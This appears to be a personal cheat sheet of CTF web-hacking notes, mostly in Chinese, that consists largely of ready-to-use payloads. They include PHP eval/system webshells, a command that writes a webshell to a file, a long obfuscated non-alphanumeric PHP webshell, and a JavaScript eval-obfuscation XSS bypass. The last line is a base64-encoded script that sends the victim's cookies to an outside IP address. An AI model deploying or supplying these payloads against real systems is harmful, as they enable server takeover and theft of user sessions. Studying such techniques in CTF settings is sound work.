POST请求：GET->POST header要加Content-Type: application/x-www-form-urlencoded 另注意不要有空格回车等……(burp易带）方法是检查length
webshell注意;|'等啊啊啊	<?=eval($_POST['a']);	a=system("ls");
$_POST[__]($_POST[_])	webshell：__=system&_=echo "<?php eval($_POST['xxx']);?>">xxx.php
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>
java避坑 函数引入写全NEW%20java.util.Scanner(NEW%20java.io.FileReader('/flag')).nextline()避免没导入
%20空格%22""%27''%2b + %0D回车%0A换行
go的iris框架问题（看不出来是golang吧），导致;后的东西会被删掉，可以用%0a绕过
html &#39表示' 被编码
https://gchq.github.io/CyberChef/解码
https://github.com/impakho/de1ctf-mc_challs/blob/master/mc_all_writeup_cn.md
windows 换行是\r\n linux不是
测试网站菜鸟https://www.runoob.com/try/try.php?filename=tryjs_throw_error
JS绕过 let try可以联行不用；base64编码任意命令执行 注意eval(atob(date64code))只执行atob，code命令不能执行，还有有的网站加密会出错ORZ坑最好在python或浏览器alert测试btoa('alert(1)')
let data = btoa('alert(1)') # alert(data)编码后要加引号！要'payload'！
try{throw"ev"+"al"}catch(e){try{throw frames[e]}catch(c){c(atob(data))}}
script引入<script>正确结束方法是<\/script>，渲染两次时使用<\\/script>

\是续行符，因为\\r\n会注释掉，所以延续下一行
windows大小写不敏感，linux敏感，可以测试区别
内网安全攻防、p神1/0
java字符串只能用“”.'是char
一键可能不回显，解决是msf
bG9jYXRpb24uaHJlZiA9ICJodHRwOi8vMzUuMTYwLjQ5LjEzNjo1OTI0My8/IiArIGJ0b2EoZG9jdW1lbnQuY29va2llKQ==